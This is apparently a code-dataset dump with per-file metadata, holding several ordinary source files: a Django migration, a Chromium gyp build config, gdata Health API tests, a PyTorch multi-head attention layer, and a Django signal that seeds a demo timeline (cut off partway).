| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
9c7ed9dbf37d0a827a645cb7f6712ca63ead9e73
| 1,948
|
py
|
Python
|
amy/workshops/migrations/0234_auto_20210228_0940.py
|
code-review-doctor/amy
|
268c1a199510457891459f3ddd73fcce7fe2b974
|
[
"MIT"
] | 53
|
2015-01-10T17:39:19.000Z
|
2019-06-12T17:36:34.000Z
|
amy/workshops/migrations/0234_auto_20210228_0940.py
|
code-review-doctor/amy
|
268c1a199510457891459f3ddd73fcce7fe2b974
|
[
"MIT"
] | 1,176
|
2015-01-02T06:32:47.000Z
|
2019-06-18T11:57:47.000Z
|
amy/workshops/migrations/0234_auto_20210228_0940.py
|
code-review-doctor/amy
|
268c1a199510457891459f3ddd73fcce7fe2b974
|
[
"MIT"
] | 44
|
2015-01-03T15:08:56.000Z
|
2019-06-09T05:33:08.000Z
|
# Generated by Django 2.2.17 on 2021-02-28 09:40
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('workshops', '0233_membership_extended'),
]
operations = [
migrations.AddField(
model_name='membership',
name='instructor_training_seats_rolled_from_previous',
field=models.PositiveIntegerField(blank=True, help_text='Instructor training seats rolled over from previous membership.', null=True),
),
migrations.AddField(
model_name='membership',
name='instructor_training_seats_rolled_over',
field=models.PositiveIntegerField(blank=True, help_text='Instructor training seats rolled over into next membership.', null=True),
),
migrations.AddField(
model_name='membership',
name='self_organized_workshops_rolled_from_previous',
field=models.PositiveIntegerField(blank=True, help_text='Self-organized workshops rolled over from previous membership.', null=True),
),
migrations.AddField(
model_name='membership',
name='self_organized_workshops_rolled_over',
field=models.PositiveIntegerField(blank=True, help_text='Self-organized workshops rolled over into next membership.', null=True),
),
migrations.AddField(
model_name='membership',
name='workshops_without_admin_fee_rolled_from_previous',
field=models.PositiveIntegerField(blank=True, help_text='Workshops without admin fee rolled over from previous membership.', null=True),
),
migrations.AddField(
model_name='membership',
name='workshops_without_admin_fee_rolled_over',
field=models.PositiveIntegerField(blank=True, help_text='Workshops without admin fee rolled over into next membership.', null=True),
),
]
| 44.272727
| 148
| 0.677618
| 203
| 1,948
| 6.29064
| 0.231527
| 0.070478
| 0.108066
| 0.12686
| 0.878622
| 0.878622
| 0.878622
| 0.858262
| 0.858262
| 0.848865
| 0
| 0.013351
| 0.231006
| 1,948
| 43
| 149
| 45.302326
| 0.839119
| 0.023614
| 0
| 0.486486
| 1
| 0
| 0.374737
| 0.144737
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.027027
| 0
| 0.108108
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
130b8996b43138f502e3d5ede9209e0f6d8d743b
| 3,860
|
gyp
|
Python
|
ui/webui/resources/js/cr/ui/compiled_resources2.gyp
|
google-ar/chromium
|
2441c86a5fd975f09a6c30cddb57dfb7fc239699
|
[
"Apache-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 777
|
2017-08-29T15:15:32.000Z
|
2022-03-21T05:29:41.000Z
|
ui/webui/resources/js/cr/ui/compiled_resources2.gyp
|
harrymarkovskiy/WebARonARCore
|
2441c86a5fd975f09a6c30cddb57dfb7fc239699
|
[
"Apache-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 66
|
2017-08-30T18:31:18.000Z
|
2021-08-02T10:59:35.000Z
|
ui/webui/resources/js/cr/ui/compiled_resources2.gyp
|
harrymarkovskiy/WebARonARCore
|
2441c86a5fd975f09a6c30cddb57dfb7fc239699
|
[
"Apache-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 123
|
2017-08-30T01:19:34.000Z
|
2022-03-17T22:55:31.000Z
|
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
{
'targets': [
{
'target_name': 'alert_overlay',
'dependencies': [
'../../compiled_resources2.gyp:cr',
'../../compiled_resources2.gyp:util',
],
'includes': ['../../../../../../third_party/closure_compiler/compile_js2.gypi'],
},
{
'target_name': 'array_data_model',
'dependencies': [
'../../compiled_resources2.gyp:cr',
'../compiled_resources2.gyp:event_target',
],
'includes': ['../../../../../../third_party/closure_compiler/compile_js2.gypi'],
},
{
'target_name': 'command',
'dependencies': [
'../../compiled_resources2.gyp:cr',
'../compiled_resources2.gyp:ui',
],
'includes': ['../../../../../../third_party/closure_compiler/compile_js2.gypi'],
},
{
'target_name': 'drag_wrapper',
'dependencies': [
'../../compiled_resources2.gyp:assert',
'../../compiled_resources2.gyp:cr',
],
'includes': ['../../../../../../third_party/closure_compiler/compile_js2.gypi'],
},
{
'target_name': 'focus_grid',
'dependencies': [
'../../compiled_resources2.gyp:assert',
'../../compiled_resources2.gyp:cr',
'../../compiled_resources2.gyp:event_tracker',
'focus_row',
],
'includes': ['../../../../../../third_party/closure_compiler/compile_js2.gypi'],
},
{
'target_name': 'focus_manager',
'dependencies': ['../../compiled_resources2.gyp:cr'],
'includes': ['../../../../../../third_party/closure_compiler/compile_js2.gypi'],
},
{
'target_name': 'focus_outline_manager',
'dependencies': ['../../compiled_resources2.gyp:cr'],
'includes': ['../../../../../../third_party/closure_compiler/compile_js2.gypi'],
},
{
'target_name': 'focus_row',
'dependencies': [
'../../compiled_resources2.gyp:assert',
'../../compiled_resources2.gyp:cr',
'../../compiled_resources2.gyp:event_tracker',
'../../compiled_resources2.gyp:util',
],
'includes': ['../../../../../../third_party/closure_compiler/compile_js2.gypi'],
},
{
'target_name': 'menu_button',
'dependencies': [
'../../compiled_resources2.gyp:assert',
'../../compiled_resources2.gyp:cr',
'../../compiled_resources2.gyp:event_tracker',
'../compiled_resources2.gyp:ui',
'menu',
'menu_item',
'position_util',
],
'includes': ['../../../../../../third_party/closure_compiler/compile_js2.gypi'],
},
{
'target_name': 'menu_item',
'dependencies': [
'../../compiled_resources2.gyp:cr',
'../../compiled_resources2.gyp:load_time_data',
'../compiled_resources2.gyp:ui',
'command',
],
'includes': ['../../../../../../third_party/closure_compiler/compile_js2.gypi'],
},
{
'target_name': 'menu',
'dependencies': [
'../../compiled_resources2.gyp:assert',
'../../compiled_resources2.gyp:cr',
'../compiled_resources2.gyp:ui',
'menu_item',
],
'includes': ['../../../../../../third_party/closure_compiler/compile_js2.gypi'],
},
{
'target_name': 'overlay',
'dependencies': [
'../../compiled_resources2.gyp:cr',
'../../compiled_resources2.gyp:util',
],
'includes': ['../../../../../../third_party/closure_compiler/compile_js2.gypi'],
},
{
'target_name': 'position_util',
'dependencies': [
'../../compiled_resources2.gyp:cr',
],
'includes': ['../../../../../../third_party/closure_compiler/compile_js2.gypi'],
},
],
}
| 32.711864
| 86
| 0.538342
| 333
| 3,860
| 5.927928
| 0.198198
| 0.273556
| 0.319149
| 0.217325
| 0.852584
| 0.847518
| 0.847518
| 0.847518
| 0.757852
| 0.738095
| 0
| 0.015688
| 0.223834
| 3,860
| 117
| 87
| 32.991453
| 0.643191
| 0.040155
| 0
| 0.578947
| 0
| 0
| 0.662253
| 0.504188
| 0
| 0
| 0
| 0
| 0.04386
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 12
|
135657bbe6eec6d4bedbfca48914a301e2f5cc68
| 219
|
py
|
Python
|
src/test/handler/excel/__init__.py
|
HenrikPilz/BMEcatConverter
|
28c6840fc70a3f04e3eae5fc7be32c7bc779c1da
|
[
"BSD-3-Clause"
] | 1
|
2021-03-14T08:20:51.000Z
|
2021-03-14T08:20:51.000Z
|
src/test/handler/excel/__init__.py
|
HenrikPilz/BMEcatConverter
|
28c6840fc70a3f04e3eae5fc7be32c7bc779c1da
|
[
"BSD-3-Clause"
] | 1
|
2021-11-29T09:56:18.000Z
|
2021-12-01T22:01:13.000Z
|
src/test/handler/excel/__init__.py
|
HenrikPilz/BMEcatConverter
|
28c6840fc70a3f04e3eae5fc7be32c7bc779c1da
|
[
"BSD-3-Clause"
] | 2
|
2021-08-30T08:14:34.000Z
|
2021-09-28T15:10:23.000Z
|
from test.handler.excel.excelTransformationTest import ExcelTransformationNonStrictValidationTest
from test.handler.excel.excelTransformationsForStrictValidationTest import ExcelTransformationsForStrictValidationTest
| 73
| 119
| 0.926941
| 14
| 219
| 14.5
| 0.571429
| 0.078818
| 0.147783
| 0.197044
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.045662
| 219
| 2
| 120
| 109.5
| 0.971292
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 1
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
1363b1cabbea6f05640d9cd39030f98cb8c06aa4
| 8,104
|
py
|
Python
|
tests/gdata_tests/health/service_test.py
|
aigarius/aigarius-gdata
|
de02b42851e766cc9e90cc7636c1b0a40e3c5d27
|
[
"Apache-2.0"
] | null | null | null |
tests/gdata_tests/health/service_test.py
|
aigarius/aigarius-gdata
|
de02b42851e766cc9e90cc7636c1b0a40e3c5d27
|
[
"Apache-2.0"
] | null | null | null |
tests/gdata_tests/health/service_test.py
|
aigarius/aigarius-gdata
|
de02b42851e766cc9e90cc7636c1b0a40e3c5d27
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python
#
# Copyright 2009 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
__author__ = 'api.eric@google.com (Eric Bidelman)'
import getpass
import unittest
from gdata import test_data
import gdata.health
import gdata.health.service
username = ''
password = ''
class HealthQueryProfileListTest(unittest.TestCase):
def setUp(self):
self.health = gdata.health.service.HealthService()
self.health.ClientLogin(username, password, source='Health Client Unit Tests')
self.profile_list_feed = self.health.GetProfileListFeed()
def testGetProfileListFeed(self):
self.assert_(isinstance(self.profile_list_feed,
gdata.health.ProfileListFeed))
self.assertEqual(self.profile_list_feed.id.text,
'https://www.google.com/health/feeds/profile/list')
first_entry = self.profile_list_feed.entry[0]
self.assert_(isinstance(first_entry, gdata.health.ProfileListEntry))
self.assert_(first_entry.GetProfileId() is not None)
self.assert_(first_entry.GetProfileName() is not None)
query = gdata.health.service.HealthProfileListQuery()
profile_list = self.health.GetProfileListFeed(query)
self.assertEqual(first_entry.GetProfileId(),
profile_list.entry[0].GetProfileId())
self.assertEqual(profile_list.id.text,
'https://www.google.com/health/feeds/profile/list')
class H9QueryProfileListTest(unittest.TestCase):
def setUp(self):
self.h9 = gdata.health.service.HealthService(use_h9_sandbox=True)
self.h9.ClientLogin(username, password, source='H9 Client Unit Tests')
self.profile_list_feed = self.h9.GetProfileListFeed()
def testGetProfileListFeed(self):
self.assert_(isinstance(self.profile_list_feed,
gdata.health.ProfileListFeed))
self.assertEqual(self.profile_list_feed.id.text,
'https://www.google.com/h9/feeds/profile/list')
first_entry = self.profile_list_feed.entry[0]
self.assert_(isinstance(first_entry, gdata.health.ProfileListEntry))
self.assert_(first_entry.GetProfileId() is not None)
self.assert_(first_entry.GetProfileName() is not None)
query = gdata.health.service.HealthProfileListQuery()
profile_list = self.h9.GetProfileListFeed(query)
self.assertEqual(first_entry.GetProfileId(),
profile_list.entry[0].GetProfileId())
self.assertEqual(profile_list.id.text,
'https://www.google.com/h9/feeds/profile/list')
class HealthQueryProfileTest(unittest.TestCase):
def setUp(self):
self.health = gdata.health.service.HealthService()
self.health.ClientLogin(username, password, source='Health Client Unit Tests')
self.profile_list_feed = self.health.GetProfileListFeed()
self.profile_id = self.profile_list_feed.entry[0].GetProfileId()
def testGetProfileFeed(self):
feed = self.health.GetProfileFeed(profile_id=self.profile_id)
self.assert_(isinstance(feed, gdata.health.ProfileFeed))
self.assert_(isinstance(feed.entry[0].ccr, gdata.health.Ccr))
def testGetProfileFeedByQuery(self):
query = gdata.health.service.HealthProfileQuery(
projection='ui', profile_id=self.profile_id)
feed = self.health.GetProfileFeed(query=query)
self.assert_(isinstance(feed, gdata.health.ProfileFeed))
self.assert_(feed.entry[0].ccr is not None)
def testGetProfileDigestFeed(self):
query = gdata.health.service.HealthProfileQuery(
projection='ui', profile_id=self.profile_id,
params={'digest': 'true'})
feed = self.health.GetProfileFeed(query=query)
self.assertEqual(len(feed.entry), 1)
def testGetMedicationsAndConditions(self):
query = gdata.health.service.HealthProfileQuery(
projection='ui', profile_id=self.profile_id,
params={'digest': 'true'}, categories=['medication|condition'])
feed = self.health.GetProfileFeed(query=query)
self.assertEqual(len(feed.entry), 1)
if feed.entry[0].ccr.GetMedications() is not None:
self.assert_(feed.entry[0].ccr.GetMedications()[0] is not None)
self.assert_(feed.entry[0].ccr.GetConditions()[0] is not None)
self.assert_(feed.entry[0].ccr.GetAllergies() is None)
self.assert_(feed.entry[0].ccr.GetAlerts() is None)
self.assert_(feed.entry[0].ccr.GetResults() is None)
class H9QueryProfileTest(unittest.TestCase):
def setUp(self):
self.h9 = gdata.health.service.HealthService(use_h9_sandbox=True)
self.h9.ClientLogin(username, password, source='H9 Client Unit Tests')
self.profile_list_feed = self.h9.GetProfileListFeed()
self.profile_id = self.profile_list_feed.entry[0].GetProfileId()
def testGetProfileFeed(self):
feed = self.h9.GetProfileFeed(profile_id=self.profile_id)
self.assert_(isinstance(feed, gdata.health.ProfileFeed))
self.assert_(feed.entry[0].ccr is not None)
def testGetProfileFeedByQuery(self):
query = gdata.health.service.HealthProfileQuery(
service='h9', projection='ui', profile_id=self.profile_id)
feed = self.h9.GetProfileFeed(query=query)
self.assert_(isinstance(feed, gdata.health.ProfileFeed))
self.assert_(feed.entry[0].ccr is not None)
class HealthNoticeTest(unittest.TestCase):
def setUp(self):
self.health = gdata.health.service.HealthService()
self.health.ClientLogin(username, password, source='Health Client Unit Tests')
self.profile_list_feed = self.health.GetProfileListFeed()
self.profile_id = self.profile_list_feed.entry[0].GetProfileId()
def testSendNotice(self):
subject_line = 'subject line'
body = 'Notice <b>body</b>.'
ccr_xml = test_data.HEALTH_CCR_NOTICE_PAYLOAD
created_entry = self.health.SendNotice(subject_line,
body,
ccr=ccr_xml,
profile_id=self.profile_id)
self.assertEqual(created_entry.title.text, subject_line)
self.assertEqual(created_entry.content.text, body)
self.assertEqual(created_entry.content.type, 'html')
problem = created_entry.ccr.GetProblems()[0]
problem_desc = problem.FindChildren('Description')[0]
name = problem_desc.FindChildren('Text')[0]
self.assertEqual(name.text, 'Aortic valve disorders')
class H9NoticeTest(unittest.TestCase):
def setUp(self):
self.h9 = gdata.health.service.HealthService(use_h9_sandbox=True)
self.h9.ClientLogin(username, password, source='H9 Client Unit Tests')
self.profile_list_feed = self.h9.GetProfileListFeed()
self.profile_id = self.profile_list_feed.entry[0].GetProfileId()
def testSendNotice(self):
subject_line = 'subject line'
body = 'Notice <b>body</b>.'
ccr_xml = test_data.HEALTH_CCR_NOTICE_PAYLOAD
created_entry = self.h9.SendNotice(subject_line, body, ccr=ccr_xml,
profile_id=self.profile_id)
self.assertEqual(created_entry.title.text, subject_line)
self.assertEqual(created_entry.content.text, body)
self.assertEqual(created_entry.content.type, 'html')
problem = created_entry.ccr.GetProblems()[0]
problem_desc = problem.FindChildren('Description')[0]
name = problem_desc.FindChildren('Text')[0]
self.assertEqual(name.text, 'Aortic valve disorders')
if __name__ == '__main__':
print ('Health API Tests\nNOTE: Please run these tests only with a test '
'account. The tests may delete or update your data.')
username = input('Please enter your username: ')
password = getpass.getpass()
unittest.main()
| 41.346939
| 82
| 0.718534
| 1,001
| 8,104
| 5.677323
| 0.184815
| 0.054197
| 0.042231
| 0.053493
| 0.799226
| 0.792011
| 0.792011
| 0.790955
| 0.763505
| 0.749076
| 0
| 0.00904
| 0.167325
| 8,104
| 195
| 83
| 41.558974
| 0.833136
| 0.072433
| 0
| 0.708333
| 0
| 0
| 0.092642
| 0
| 0
| 0
| 0
| 0
| 0.256944
| 1
| 0.111111
| false
| 0.0625
| 0.034722
| 0
| 0.1875
| 0.006944
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
1370a0dcd2d3169f9ccd4544439c5891864f0f3d
| 8,692
|
py
|
Python
|
espnet/nets/pytorch_backend/transformer/attention.py
|
yowinzi/Compressive_Transformer
|
af525d8a5b3e08c083c4da59802a00c327fd8908
|
[
"Apache-2.0"
] | 1
|
2021-04-14T02:15:46.000Z
|
2021-04-14T02:15:46.000Z
|
espnet/nets/pytorch_backend/transformer/attention.py
|
NCTUMLlab/Chi-Hang-Leong-Online_Compressive_Transformer_for_Speech_Recognition
|
3f159ba9cf1ca9baabf0782d8acef4bb7332d8b9
|
[
"Apache-2.0"
] | null | null | null |
espnet/nets/pytorch_backend/transformer/attention.py
|
NCTUMLlab/Chi-Hang-Leong-Online_Compressive_Transformer_for_Speech_Recognition
|
3f159ba9cf1ca9baabf0782d8acef4bb7332d8b9
|
[
"Apache-2.0"
] | 2
|
2021-03-30T06:02:08.000Z
|
2021-08-06T06:59:22.000Z
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Copyright 2019 Shigeki Karita
# Apache 2.0 (http://www.apache.org/licenses/LICENSE-2.0)
"""Multi-Head Attention layer definition."""
import math
import numpy
import torch
from torch import nn
class MultiHeadedAttention(nn.Module):
"""Multi-Head Attention layer.
:param int n_head: the number of head s
:param int n_feat: the number of features
:param float dropout_rate: dropout rate
"""
def __init__(self, n_head, n_feat, dropout_rate):
"""Construct an MultiHeadedAttention object."""
super(MultiHeadedAttention, self).__init__()
assert n_feat % n_head == 0
# We assume d_v always equals d_k
self.d_k = n_feat // n_head
self.h = n_head
self.linear_q = nn.Linear(n_feat, n_feat)
self.linear_k = nn.Linear(n_feat, n_feat)
self.linear_v = nn.Linear(n_feat, n_feat)
self.linear_out = nn.Linear(n_feat, n_feat)
self.attn = None
self.dropout = nn.Dropout(p=dropout_rate)
def forward(self, query, key, value, mask):
"""Compute 'Scaled Dot Product Attention'.
:param torch.Tensor query: (batch, time1, size)
:param torch.Tensor key: (batch, time2, size)
:param torch.Tensor value: (batch, time2, size)
:param torch.Tensor mask: (batch, time1, time2)
:param torch.nn.Dropout dropout:
:return torch.Tensor: attentined and transformed `value` (batch, time1, d_model)
weighted by the query dot key attention (batch, head, time1, time2)
"""
if(len(query.shape)==3):
n_batch = query.size(0)
q = self.linear_q(query).view(n_batch, -1, self.h, self.d_k)
k = self.linear_k(key).view(n_batch, -1, self.h, self.d_k)
v = self.linear_v(value).view(n_batch, -1, self.h, self.d_k)
q = q.transpose(1, 2) # (batch, head, time1, d_k)
k = k.transpose(1, 2) # (batch, head, time2, d_k)
v = v.transpose(1, 2) # (batch, head, time2, d_k)
scores = torch.matmul(q, k.transpose(-2, -1)) / math.sqrt(
self.d_k
) # (batch, head, time1, time2)
if mask is not None:
mask = mask.unsqueeze(1).eq(0) # (batch, 1, time1, time2)
min_value = float(
numpy.finfo(torch.tensor(0, dtype=scores.dtype).numpy().dtype).min
)
scores = scores.masked_fill(mask, min_value)
self.attn = torch.softmax(scores, dim=-1).masked_fill(
mask, 0.0
) # (batch, head, time1, time2)
else:
self.attn = torch.softmax(scores, dim=-1) # (batch, head, time1, time2)
p_attn = self.dropout(self.attn)
x = torch.matmul(p_attn, v) # (batch, head, time1, d_k)
x = (
x.transpose(1, 2).contiguous().view(n_batch, -1, self.h * self.d_k)
) # (batch, time1, d_model)
else:
n_batch = query.size(0)
n_chunk = query.size(1)
q = self.linear_q(query).view(n_batch, n_chunk, -1, self.h, self.d_k)
k = self.linear_k(key).view(n_batch, n_chunk, -1, self.h, self.d_k)
v = self.linear_v(value).view(n_batch, n_chunk, -1, self.h, self.d_k)
q = q.transpose(2, 3) # (batch, chunk, head, time1, d_k)
k = k.transpose(2, 3) # (batch, chunk, head, time2, d_k)
v = v.transpose(2, 3) # (batch, chunk, head, time2, d_k)
scores = torch.matmul(q, k.transpose(-2, -1)) / math.sqrt(
self.d_k
) # (batch, chunk, head, time1, time2)
if mask is not None:
mask = mask.unsqueeze(2).eq(0) # (batch, chunk, 1, time1, time2)
min_value = float(
numpy.finfo(torch.tensor(0, dtype=scores.dtype).numpy().dtype).min
)
scores = scores.masked_fill(mask, min_value) #error
self.attn = torch.softmax(scores, dim=-1).masked_fill(
mask, 0.0
) # (batch, chunk, head, time1, time2)
else:
self.attn = torch.softmax(scores, dim=-1) # (batch, chunk, head, time1, time2)
p_attn = self.dropout(self.attn)
x = torch.matmul(p_attn, v) # (batch, chunk, head, time1, d_k)
x = (
x.transpose(2, 3).contiguous().view(n_batch, n_chunk, -1, self.h * self.d_k)
) # (batch, chunk, time1, d_model)
return self.linear_out(x) # (batch, time1, d_model)
def simple_attention(self,query,key,value):
n_batch = query.size(0)
q = torch.nn.functional.linear(query,self.linear_q.weight) #,self.linear_q.bias.detach()) don't use bias
k = torch.nn.functional.linear(key,self.linear_k.weight) #,self.linear_k.bias.detach())
v = torch.nn.functional.linear(value,self.linear_v.weight) #,self.linear_v.bias.detach())
scores = torch.matmul(q,k.transpose(-2,-1)) #/math.sqrt(self.d_k)
attn = torch.softmax(scores,dim=-1)
return torch.matmul(attn,v)
class MultiHeadedAttention4dim(nn.Module):
"""Multi-Head Attention layer.
:param int n_head: the number of head s
:param int n_feat: the number of features
:param float dropout_rate: dropout rate
"""
def __init__(self, n_head, n_feat, dropout_rate):
"""Construct an MultiHeadedAttention4dim object."""
super(MultiHeadedAttention4dim, self).__init__()
assert n_feat % n_head == 0
# We assume d_v always equals d_k
self.d_k = n_feat // n_head
self.h = n_head
self.linear_q = nn.Linear(n_feat, n_feat)
self.linear_k = nn.Linear(n_feat, n_feat)
self.linear_v = nn.Linear(n_feat, n_feat)
self.linear_out = nn.Linear(n_feat, n_feat)
self.attn = None
self.dropout = nn.Dropout(p=dropout_rate)
def forward(self, query, key, value, mask):
"""Compute 'Scaled Dot Product Attention'.
:param torch.Tensor query: (batch, chunk, time1, size)
:param torch.Tensor key: (batch, chunk, time2, size)
:param torch.Tensor value: (batch, chunk, time2, size)
:param torch.Tensor mask: (batch, chunk, time1, time2)
:param torch.nn.Dropout dropout:
:return torch.Tensor: attentined and transformed `value` (batch, chunk, time1, d_model)
weighted by the query dot key attention (batch, chunk, head, time1, time2)
"""
n_batch = query.size(0)
n_chunk = query.size(1)
q = self.linear_q(query).view(n_batch, n_chunk, -1, self.h, self.d_k)
k = self.linear_k(key).view(n_batch, n_chunk, -1, self.h, self.d_k)
v = self.linear_v(value).view(n_batch, n_chunk, -1, self.h, self.d_k)
q = q.transpose(2, 3) # (batch, chunk, head, time1, d_k)
k = k.transpose(2, 3) # (batch, chunk, head, time2, d_k)
v = v.transpose(2, 3) # (batch, chunk, head, time2, d_k)
scores = torch.matmul(q, k.transpose(-2, -1)) / math.sqrt(
self.d_k
) # (batch, chunk, head, time1, time2)
if mask is not None:
mask = mask.unsqueeze(2).eq(0) # (batch, chunk, 1, time1, time2)
min_value = float(
numpy.finfo(torch.tensor(0, dtype=scores.dtype).numpy().dtype).min
)
scores = scores.masked_fill(mask, min_value) #error
self.attn = torch.softmax(scores, dim=-1).masked_fill(
mask, 0.0
) # (batch, chunk, head, time1, time2)
else:
self.attn = torch.softmax(scores, dim=-1) # (batch, chunk, head, time1, time2)
p_attn = self.dropout(self.attn)
x = torch.matmul(p_attn, v) # (batch, chunk, head, time1, d_k)
x = (
x.transpose(2, 3).contiguous().view(n_batch, n_chunk, -1, self.h * self.d_k)
) # (batch, chunk, time1, d_model)
return self.linear_out(x) # (batch, chunk, time1, d_model)
def simple_attention(self,query,key,value):
n_batch = query.size(0)
q = torch.nn.functional.linear(query,self.linear_q.weight) #,self.linear_q.bias.detach()) don't use bias
k = torch.nn.functional.linear(key,self.linear_k.weight) #,self.linear_k.bias.detach())
v = torch.nn.functional.linear(value,self.linear_v.weight) #,self.linear_v.bias.detach())
scores = torch.matmul(q,k.transpose(-2,-1)) #/math.sqrt(self.d_k)
attn = torch.softmax(scores,dim=-1)
return torch.matmul(attn,v)
| 45.036269
| 112
| 0.577773
| 1,238
| 8,692
| 3.914378
| 0.099354
| 0.013619
| 0.023525
| 0.024763
| 0.917664
| 0.906934
| 0.903632
| 0.850805
| 0.838423
| 0.827074
| 0
| 0.024469
| 0.28532
| 8,692
| 192
| 113
| 45.270833
| 0.755634
| 0.304648
| 0
| 0.776923
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.015385
| 1
| 0.046154
| false
| 0
| 0.030769
| 0
| 0.123077
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b92017226259fea79a4605a4650174c5f269b257
| 4,347
|
py
|
Python
|
accounts/signals.py
|
raoulcapello/timelinor
|
eb162ad4e11452bcd180b3bf53866c8e3f35934d
|
[
"MIT"
] | null | null | null |
accounts/signals.py
|
raoulcapello/timelinor
|
eb162ad4e11452bcd180b3bf53866c8e3f35934d
|
[
"MIT"
] | 127
|
2021-08-18T10:18:27.000Z
|
2022-03-31T10:19:12.000Z
|
accounts/signals.py
|
raoulcapello/timelinor
|
eb162ad4e11452bcd180b3bf53866c8e3f35934d
|
[
"MIT"
] | null | null | null |
from django.db.models.signals import post_save
from django.contrib.auth import get_user_model
from timelines.models import Timeline, TimelineEvent
import datetime
User = get_user_model()
def my_first_timeline(sender, instance, created, **kwargs):
"""
Create a first, demo timeline for new users.
"""
if created:
# Create a timeline object
timeline = Timeline.objects.create(
user=instance,
title='My First Timeline',
description=(
'Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.'
),
)
# Create several events and place them on the newly created
# timeline
TimelineEvent.objects.create(
timeline=timeline,
title='2021',
subtitle='Web Developer',
description='Lorem ipsum dolor sit amet, consectetur adipiscing elit. Vestibulum mattis felis vitae risus pulvinar tincidunt. Nam ac venenatis enim. Aenean hendrerit justo sed. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Vestibulum mattis felis vitae risus pulvinar tincidunt. Nam ac venenatis enim. Aenean hendrerit justo sed. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Vestibulum mattis felis vitae risus pulvinar tincidunt. Nam ac venenatis enim. Aenean hendrerit justo sed.',
date=datetime.date(2021, 8, 1),
)
TimelineEvent.objects.create(
timeline=timeline,
title='2020',
subtitle='Web Designer',
description='Lorem ipsum dolor sit amet, consectetur adipiscing elit. Vestibulum mattis felis vitae risus pulvinar tincidunt. Nam ac venenatis enim. Aenean hendrerit justo sed. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Vestibulum mattis felis vitae risus pulvinar tincidunt. Nam ac venenatis enim. Aenean hendrerit justo sed. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Vestibulum mattis felis vitae risus pulvinar tincidunt. Nam ac venenatis enim. Aenean hendrerit justo sed.',
date=datetime.date(2020, 8, 1),
)
TimelineEvent.objects.create(
timeline=timeline,
title='2019',
subtitle='DevOps Engineer',
description='Lorem ipsum dolor sit amet, consectetur adipiscing elit. Vestibulum mattis felis vitae risus pulvinar tincidunt. Nam ac venenatis enim. Aenean hendrerit justo sed. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Vestibulum mattis felis vitae risus pulvinar tincidunt. Nam ac venenatis enim. Aenean hendrerit justo sed. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Vestibulum mattis felis vitae risus pulvinar tincidunt. Nam ac venenatis enim. Aenean hendrerit justo sed.',
date=datetime.date(2019, 8, 1),
)
TimelineEvent.objects.create(
timeline=timeline,
title='2018',
subtitle='Systems Engineer',
